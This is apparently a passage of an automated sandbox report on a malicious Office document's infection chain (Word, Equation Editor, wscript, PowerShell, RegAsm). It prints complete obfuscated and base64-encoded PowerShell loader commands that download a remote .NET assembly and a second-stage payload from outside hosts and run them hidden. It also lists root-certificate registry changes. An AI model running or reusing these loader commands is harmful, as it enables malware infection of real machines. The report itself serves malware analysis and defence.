              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CB50
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B545A push ecx; ret 2_2_005B545B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B6B42 push ecx; ret 2_2_005B6B43
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AE57D pushad ; ret 2_2_005AE5BB
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B5462 push ecx; ret 2_2_005B5463
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A8F60 push eax; retf 2_2_005A8F61
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A4219 pushad ; ret 2_2_005A4233
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B37C6 push eax; ret 2_2_005B37C7
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AE49E pushad ; ret 2_2_005AE573
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005B37BE push eax; ret 2_2_005B37BF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002949D3 push esp; ret 8_2_00294A51
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029DB1D push es; retf 0029h8_2_0029DB3D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002964FF push esp; iretd 8_2_00296509
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029DD3F push esi; retf 0029h8_2_0029DD45
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029DF24 push eax; retf 8_2_0029DFBD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029DFE0 push eax; retf 8_2_0029DFBD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0029DFCC push ecx; ret 8_2_0029DFCD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457106 push ecx; ret 9_2_00457119
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045B11A push esp; ret 9_2_0045B141
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045E54D push esi; ret 9_2_0045E556
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457A28 push eax; ret 9_2_00457A46
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434E56 push ecx; ret 9_2_00434E69

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406EB0 ShellExecuteW,URLDownloadToFileW,9_2_00406EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AA4A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CB50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
